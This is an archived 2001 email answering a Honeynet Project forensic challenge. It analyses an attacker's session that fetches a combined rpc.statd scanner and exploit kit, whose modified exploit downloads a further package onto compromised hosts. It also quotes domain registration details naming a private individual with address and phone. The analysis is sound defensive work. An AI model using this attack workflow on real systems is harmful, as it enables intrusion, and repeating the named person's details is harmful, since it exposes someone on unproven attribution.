From CARL.DONALDSON@ca.com Sat Mar 17 19:44:29 2001 Date: Fri, 2 Mar 2001 10:51:41 -0000 From: "Donaldson, Carl" To: project@honeynet.org Subject: Scan 13 [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] The Challenge: 1. What is the blackhat attempting to do with his command line syntax? 2. What does the tool accomplish? 3. How does the tool work? 4. Is this tool a worm, or would you classify it as something else? 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? Bonus Question: 6. What information can you obtain about who is using or created the tool? Answer Analysis of the attack a) The attacker changes his working directory to the /usr/sbin/.mail directory, a hidden directory on the system. b) He then uses the Lynx application to download a tarred file called LUCKROOT.TAR from the website www.becys.org c) The attacker runs the command "tar -xvfz LUCKROOT.TAR", which means down as "tar -extract -verbose -file -gzip LUCKROOT.TAR". This fails because the switch order is wrong. d) The attacker trys to run the tar command with the switches in the correct order, but in his haste he types a lowercase u for the filename, which fails to complete with a tab key press and causes the command to fail. e) The atacker trys again, but only enters an uppercase L. It is possible there is another file or directory in the .mail directory which causes the auto complete to fail. f) The attacker enters the command with the switches in the correct order and the correct file name. The LUCKROOT.tar file extracts and expands into a directory called /usr/sbin/.mail/luckroot/ g) The 5 files extracted are luckstatdx, luckstatdx.c, luckgo, luckscan-a, & luckscan-a.c. h) The attacker starts runs the luckgo script, which is an automated rpc.statd vunerability scanner & exploit,. The numbers entered after the command "luckgo" are ip address ranges which the scanner should attempt to scan & exploit. g) The LUCKROOT tool isn't a worm as it's spread isn't completely automated. The tool is a combined rpc.statd vunerability scanner & exploit which scans large IP address ranges & runs the statd exploit. The exploit allows commands to be run as root on the remote system. h) The luckgo script is a shellscript to tie the scanner & exploit into one easy package. i) The luckstatdx.c code is probably based on the statdx.c code by ron1n. (http://packetstorm.securify.com/0008-exploits/statdx.c). The statdx code has been modified by becys to download & install a package called xzibit.tar.gz from www.becys.org once the system has been compromised. He's also removed the headers and changed some of the messages. j) Luckscan-a is modified code based on the pscan.c code by Volatile contained in the statdx-scan package (http://packetstorm.securify.com/UNIX/scanners/statdx-scan.tar.gz) The tools author uses the name becys in the code modifications & the tools are downloaded from the web site www.becys.org. The DNS registration information for the becys.org domain is as follows Becys.org bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Fax- Technical Contact: Web Site Source, In info@websitesource.com Web Site Source, Inc. 2476 Bolsover, Suite 484 Houston, TX 77005-2518 US Phone- 713-667-2520 Fax- 800-863-6499 This information provides useful points of contact for further investigation The IP address of the server www.becys.org is registered to Alabanza, a web hosting company in Balitmore. Alabanza publish an acceptable use policy on their website which specifically prohibits hacker tools. thanks Carl Donaldson Computer Associates Consultant tel: +44 (0)161 928 9334 fax: +44 (0)161 941 3775 mobile: +44 (0)7801 456925 carl.donaldson@ca.com ************************************************************************* The information transmitted in this email is intended for the addressee only and may contain confidential and/or privileged material. Any review, retransmission, dissemination, reliance upon or other use of, this information by persons or entities other than the addressee is prohibited. If you received this in error, please contact the sender and delete the material. *************************************************************************